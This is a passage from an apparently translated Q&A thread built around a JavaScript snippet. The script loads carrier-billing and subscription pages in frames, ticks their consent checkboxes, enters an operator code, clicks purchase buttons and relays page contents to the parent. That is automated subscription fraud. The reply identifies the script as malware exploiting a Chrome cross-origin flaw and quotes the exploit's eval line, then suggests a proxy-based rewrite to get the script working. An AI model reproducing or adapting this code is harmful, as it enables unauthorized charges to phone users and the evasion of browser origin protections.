    window.parent.postMessage('A : [Refresh]ed>>>','*');
}
else if(document.getElementById('older')!=undefined)
{
    window.parent.postMessage('found bolder>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    document.getElementById('older').checked = true;
    document.getElementsByTagName('form')[0].submit();
    window.parent.postMessage('form submitted>>>', '*');
}
else if(document.getElementsByClassName('large expanded success button float-center').length>0)
{
    window.parent.postMessage('found large expanded success button float-center>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    document.getElementsByClassName('large expanded success button float-center')[0].click();
    window.parent.postMessage('large expanded success button float-center submitted>>>', '*');
}
else if(window.location.href.indexOf("appsilike.mobi/BE")!=-1)
{

    window.parent.postMessage('in appsilike.mobi>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    setTimeout(
        function () {
            document.getElementsByClassName('button pulse').length>0 && document.getElementById('check')!=undefined

            window.parent.postMessage('found button pulse>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
            document.getElementById('check').checked = true;
            document.getElementsByClassName('button pulse')[0].click();
            window.parent.postMessage('found button pulse clicked>>>', '*');
        },
        1900
    );

    window.parent.postMessage('in appsilike.mobi2>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');

}
else if(document.getElementById('Operator')!=undefined)
{
    window.parent.postMessage('found Operator>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    document.getElementById('Operator').value = '20610';
    document.getElementById('submit_button').click();
    window.parent.postMessage('submit_button submitted>>>', '*');
}

else if(url.indexOf('mdsp.orange.be/w-ha/app-bundlepurchase/node')!=-1 &&
    document.getElementsByClassName('button').length==3)
{
    window.parent.postMessage('found btn >>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.parent.postMessage('found btn>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    setTimeout(

        function () {
            document.getElementsByClassName('button')[2].click();
        },
        2000

    );

    window.parent.postMessage('btn clicked>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(ttt!="" && ttt.indexOf("video-wrld.com/BE")!=-1)
{

    window.parent.postMessage('zfound ttt>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.parent.postMessage('zfound ttt>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
    location.replace(ttt);
    window.parent.postMessage('zfound ttt clicked>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else
{
    window.parent.postMessage('else >>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
    window.parent.postMessage('else >>>'+ Base64.encode(document.getElementsByTagName('html')[0].innerHTML), '*');
    window.parent.postMessage('6464.DB CALL-HTML(0)>>>'+ (document.getElementsByTagName('html')[0].innerHTML), '*');

}

在调试期间,从值执行的代码是else,如果调用:

else if(window.location.href.indexOf("appsilike.mobi/BE")!=-1)

本质上,脚本的作用是创建一个带有第三方网站的iframe,导航该网站,在那里寻找提交按钮并将其传递给父母,同时勾选复选框。

1 个答案:

答案 0 :(得分:3)

这看起来像利用https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6755的恶意代码,已在Chrome 46中修复,如下所示:https://chromereleases.googleblog.com/2015/10/stable-channel-update.html

  

[$ 8837] [519558]高CVE-2015-6755:Blink中的跨源旁路。   感谢Mariusz Mlynski。

此行将被调用,因为isAndroidMobile将为false

window.open("\u0000javascript:eval(atob(\""+ value +"\"))", "androidload"+x);

这里我们看到了漏洞利用的用法。使脚本运行的解决方案是使用CORS代理并重写代码。